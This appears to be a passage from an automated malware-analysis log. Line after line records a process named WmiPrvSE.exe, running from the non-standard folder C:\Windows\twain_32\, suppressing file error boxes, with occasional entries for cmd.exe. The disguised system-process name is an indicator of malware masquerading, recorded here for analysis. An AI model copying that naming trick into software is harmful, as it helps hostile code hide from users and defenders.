Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
